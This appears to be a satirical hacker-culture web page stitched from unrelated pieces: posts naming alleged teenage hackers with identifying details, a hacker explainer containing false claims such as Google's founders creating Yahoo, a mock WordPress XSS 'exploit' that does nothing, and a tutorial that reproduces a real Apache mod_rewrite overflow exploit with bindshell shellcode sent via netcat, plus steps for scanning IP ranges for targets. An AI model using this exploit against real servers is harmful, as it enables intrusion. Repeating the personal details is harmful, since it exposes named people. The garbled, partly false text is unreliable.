In this episode of Full Disclosure, the whitehat hackers explain how to hack into any website using a Cross Site Scripting attack.
Cross-Site Scripting is a type of security vulnerability that affects web applications that do not sanitize user input properly. This kind of vulnerability allows an “attacker” to inject HTML or client side script like JavaScript into the website.
Blackhat hacker penguinman2100 demonstrates how to hack google to upload any hacker files or pictures to any website using PHP Photo exploits.
The blackhat hacker penguinman2100 hacks into websites using this tutorial as you can see in our video.
He has illegally hacked into sites such as http://textideas.com and http://www.sq-bleiburg.at as he has proven with the access in this video.
Penguinman2100 writes on his cracker blog:
**NEWS: I have recently become intrested in “Google Hacking” now I know that sounds pretty bad but it isnt really. “Google Hacking” is basically accessing things on Google in which the average person cant do and in which some illegal activity can occur.
The blackhat hacker Penguinman2100 is also known as Zachary D., he is male and 19 years old, and he currently lives in Calgary, Alberta (Canada), where laws against blackhat hacking in google do not exist.
His hack partner SteveTheMaster (Steve Nahilian) also a blackhat and is a much dangerous hacker with advanced skills.
Zach~
Hello! we are hacking partners. my name is zach. im not as good as of a hacker as steve, but i’ll do my part.Steve~
sup, i am Stevethemaster (click here to chat on AIM) from Steve Company, i am the king of goldfinger & Qcode64 hacking. i do every type of hacking known to hackers on da web, l00k 0ut 4 my vids. Zach is my hacking partner, he has a great mind on image hacks. we are from spiralmountain.co.uk
Thank you to Zachary D. and Steve the Master Hacker for producing these excellent hacking video tutorials to teach blackhats how to hack illegally into websites such as textideas.com. Please we are waiting for episode 2 of How to Hack Google! Keep up the good works and submit great hacking tutorials for our readers!
Blackhat demonstration video for Google hackers:
Hacker Hierarchy
Psychologist and Expert Hacker Marc Rogers says there are several subgroups of hackers —
newbies, cyberpunks, coders and cyber terrorists.
Newbies are hackers who have access to hacking tools but aren’t really aware of how computers and programs work. Cyberpunks are savvier and are less likely to get caught than a newbie while hacking a system, but they have a tendency to boast about their accomplishments. Coders write the programs other hackers use to infiltrate and navigate computer systems. A cyber terrorist is a professional hacker who infiltrates systems for profit — he might sabotage a company or raid a corporation’s databases for proprietary information.
Hackers and Crackers
Many computer programmers insist that the word “hacker” applies only to law-abiding enthusiasts who help create programs and applications or improve computer security. Anyone using his or her skills maliciously isn’t a hacker at all, but a cracker.
Even if the so-called hackers using malicious hacking skills have always, and continue to label themselves and their peers as hackers first and foremost, the nomenclature does not legally apply according to the Arbitration of What Stuff is Called Act of 2002. In addition, loosely organized social groups and clubs have not traditionally been permitted to determine their own names or identities. All definitions related to hacking must be approved by at least one academic over the age of 55 years old in an authorative tone whilst speaking to a relatively-ignorant IT journalist about the latest sensationalized hacker story. - Ed.
Crackers infiltrate systems and cause mischief, or worse. Unfortunately, most people outside the hacker community use the word as a negative term because they don’t understand the distinction between hackers and crackers.
Spying on e-mail: Hackers have created code that lets them intercept and read e-mail messages — the Internet’s equivalent to wiretapping. Today, most e-mail programs use encryption formulas so complex that even if a hacker intercepts the message, he won’t be able to read it.
Individually, many hackers are antisocial. Their intense interest in computers and programming can become a communication barrier. Left to his or her own devices, a hacker can spend hours working on a computer program while neglecting everything else.
There are many websites dedicated to hacking. The hacker journal “2600: The Hacker Quarterly” has its own site, complete with a live broadcast section dedicated to hacker topics. The print version is still available on newsstands. Web sites like Hacker.org promote learning and include puzzles and competitions for hackers to test their skills.
Not all hackers try to explore forbidden computer systems. Some use their talents and knowledge to create better software and security measures. In fact, many hackers who once used their skills to break into systems now put that knowledge and ingenuity to use by creating more comprehensive security measures. In a way, the Internet is a battleground between different kinds of hackers — the bad guys, or black hats, who try to infiltrate systems or spread viruses, and the good guys, or white hats, who bolster security systems and develop powerful virus protection software.
Glenn Chapman/AFP/Getty Images
Hackers work together to create “mashups” of Yahoo applications at Google Hack Day 2006.
Hacking For a Living
Hackers who obey the law can make a good living. Several companies hire hackers to test their security systems for flaws. Hackers can also make their fortunes by creating useful programs and applications, like Stanford University students Larry Page and Sergey Brin. Page and Brin worked together to create a search engine they would eventually name Yahoo. Today, they are tied for 26th place on Forbes’ list of the world’s most wealthy billionaires [source: Forbes].
Famous Hackers: Lamo
Adrian Lamo hacked into computer systems using computers at libraries and Internet cafes. He would explore high-profile systems for security flaws (such as open proxies), exploit the flaws (or make use of the proxy) to “hack” into the system, and then send a message to the corresponding company, letting them know about the security flaw. Unfortunately for Lamo, he was doing this on his own time rather than as a paid consultant — his activities were illegal. He also snooped around a lot, reading sensitive information and giving himself access to confidential material. He was caught after breaking into the computer system belonging to the New York Times.
It’s likely that there are thousands of hackers active online today, but an accurate count is impossible. Many (>99%) hackers don’t really know what they are doing — they’re just using dangerous tools they don’t completely understand.
0day XSS Exploit for Wordpress 2.3 – wp-slimstat 0.92 – [xssworm.com]
There is a serious holes in wordpress 2.3 that can be used with XSS by a blackhat hacker to attack the wordpress administrator and steal cookies from blogmins. This attack is known as 0day because it has just been reported to public and this is first day of public vulnerability, and 0day means ‘published.’
Below is demonstration attack against wordpress install at http://xssworm.blogvis.com – please do not use him for you attack as we do not have a patch for this 0day exploit. XSSWorm admin is being alerted and look for suspicious click (-;
Proof of concept:
http://wordpress-web-blog.com/wp-admin/index.php?page=wp-slimstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=<xss shellcode>
This attack to be used against wordpress web blog blogmin to steal blogosphere token to hack blogs. Of course we have included exploit code for this bug at the below.
We have looked at coding for wp-slimstat but we cannot see any problem with input validating. Maybe some of the xssworm.com readers can show us where problem is in the php code because we cannot see any porblem here:
–snips:
C:\temp>findstr GET wp-slimstat.php
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
$myFilterField = intval( $_GET[’ff’] );
$myFilterType = intval( $_GET[’ft’] );
$myFilterString = $_GET[’fi’];
$myFilterInterval = $_GET[’fd’];
‘.(!empty($myFilterString)?’— <a href=”?page=’.$_GET[’page’].’&panel=’.$_GET[”panel”].’”>’.__(’Reset filters’, ‘wp-slimstat’).’</a>’:”).’
<input type=”hidden” name=”page” value=”‘.$_GET[’page’].’” />
<input type=”hidden” name=”panel” value=”‘.$_GET[”panel”].’” />
<input type=”hidden” name=”fd” value=”‘.$_GET[”fd”].’” /></form>’;
–snips
With programmor using $_GET variable from user into echo into html output maybe php automatic GET validation filtering is not working for security? We are not programmers of php so we cannot see any porblems here as bug are too complex to understand.
Exploit code for perl whitehats included here:
# Wordpress 2.3 0day exploit – http://xssworm.com
#
# A bug exist in wordpress 2.3 that allow hacker to
# steal blog cookie from wordpress blogmin.
#
# To exploit scripting bug the attacker make link
# to URL of slimstat with XSS shellcode and force
# blog admin to hit link by embedding into fish
# email or making blogmin follow interesting links.
# Also hacker can embed into refer or trackback
# to inject scripting into wordpress dashboard or
# make blogmin visit malicious resource when viewing
# he’s blog.
#
#
# Status: not patched published 0day vulnerability
# Vendor: wordpress.org
# Credit: http://xssworm.com
# Discovery: 1st November 2007
# Exploit developer: Fracesco Vaj (vaj@xssworm.com)
#
# Instruction:
# To execute exploit for wordpress you will need perl or linux
#
# Usage:
#
# Execute with perl or linux as:
# perl wordpress-2.3-0day-xss-injection-bug.pl
#
# Hacker will get prompts for target information.
# Please do not use for irresponsible hacking or to make money.
# Disclaimer: XSSWORM.COM is not responsible.
#
#
#use Net::DNS:Simple;
#use Math;
use Socket;
print “Welcome. What is target email address of wordpress blog admin : \n”;
my $target = <STDIN>;
print “ok target is $target\n”;
sleep(3);
print “ok What is address of wordpress blog : \n”;
sleep(5); my $address = <STDIN>;
print “ok target is $target\n”;
sleep(6);
# print “testing”
print “ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n”;
print “\n\n — CUT OUTPUT HERE — \n\n”;
print “HELO xssworm.com\n”;
print “RSET\n”;
PRINT “MAIL FROM: <xssworm@hotmail.com>\n”;
print “RCPT TO: <$target>\n”;
print “DATA\n”; print “Free x pciture and movies at $address\n”;
print “\r\n.\r\nquit\r\n”;
print “\n\n — END OF OUTPUT CUT HERE –\n”;
print “”;
print “Ok now you neeed to cut the exploit above and paste it to:\n”;
print “$address : 25 \n”;
print “Shellcode by vaj@xssworm.com c. 2007\n”;
print “End of attack.\n”;
print “”;
#print “Debug mode on”
#print “XSS initialized”
#payload
sleep(1); return(0);
# snips
#
Please note that this wp-slimstat does not contain any code injection or mysql injection bug vector that is opened to blackkhat attack via transport of xss.
Many thanks for your comments on this vulnerability in wordpress 2.4
Thanks vaj
Today we have a very special post of a hacking tutorial by the blackhat hacker Sunjester
But first you must need to download the following hacking exploit:
http://www.milw0rm.com/exploits/2237
Ok so first we have step 1.
Code:
#!/bin/sh # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice# # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0×0834ae77 for any other version/system find it. # # Gulcas rulez
echo -e “mod_rewrite apache off-by-one overflow” echo “by jack <jack\x40gulcas\x2eorg>\n\n” if [ $# -ne 1 ] ; then echo “Usage: $0 webserver” exit fi host=$1 echo -ne “GET /kung/ldap://localhost/`perl -e ‘print “%90″x128′`%89%e6\ %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ Host: $host\r\n\r\n” | nc $host 80 # milw0rm.com [2006-08-21]
Sunjester says:
that code runs from a unix shell. so, get into your favorite shell. this tutorial is for thoe who have no idea what to do, with that in mind, lets continue.
If you are stuck already and don’t know where to get shell, Sunjester recommends to you a backtrack attack:
if you are stuck already and dont know where to get orm how to use a shell, im using a livecd, backtrack. lets do the first thing and GET the exploit.
Step 2: we have to download it from milw0rm. - http://milworm.com
Figure 1: Wget exploit downloading tutorial:
Step 2: Sunjester says to all elitehacker student:
now we have to edit the file since it downloaded with some html. if you try to run the file now it will error, it will say soemthing like “Permission Denied”
Example:
Sunjestre say we need to change the files permissions, because:
this aint windows this is a secure filesystem.
ok?
so lets chmod that badboy, might as well give it 777 since im root and its just a livecd. the 777 permission gives read/write/execute to the user, the group, and the owner of the file.
as i said, since im root, and its a friggin livecd, this will be fine.
you should never run scripts under root on your own box.
step 3:
now we can run the script, but we have to remove some stuff that wget put in there when we downloaded it, just some HTML. Open up vi and start replacing the html. you should only have to delete the top line and replace the " with double quotes.
Sunjester: once your done you can save and quit vi or whatever editor you used and run it. should come out something liek below.
now that the script is working, lets look at some ways to find our target servers. we can use nmap and google. those are the two biggest ones i can think of and that i use myself.
you could target really any website
since we will scan a while range or IP addresses. so type something like ::
Sunjester says to start there (festival.com) and scan away.
remember to save logs so its easier to look through, you can just grep through your logs of the scans. below is an example of an nmap scan to gather information about whats on port 80. hopefully we can find some vulnerable ones in that range, if not, pick another hobby.
once you find one, we just run the exploit, lets check and see fi the exploit worked…
*** Note to readers: Unfortunately Sunjester has not included all of screenshots of hacking into FESTIVAL.COM ***
And now we move on to the final part of hacking:
Step 5:
Sunjester says : ” sweet, netcat your way in this should be the end of the road. if yuo are still having probelsm running this small script, seek help. you need help. “
–
With special thanks to http://elitehackers.info/?pwnd=true
milw0rm Hacker Lifestyle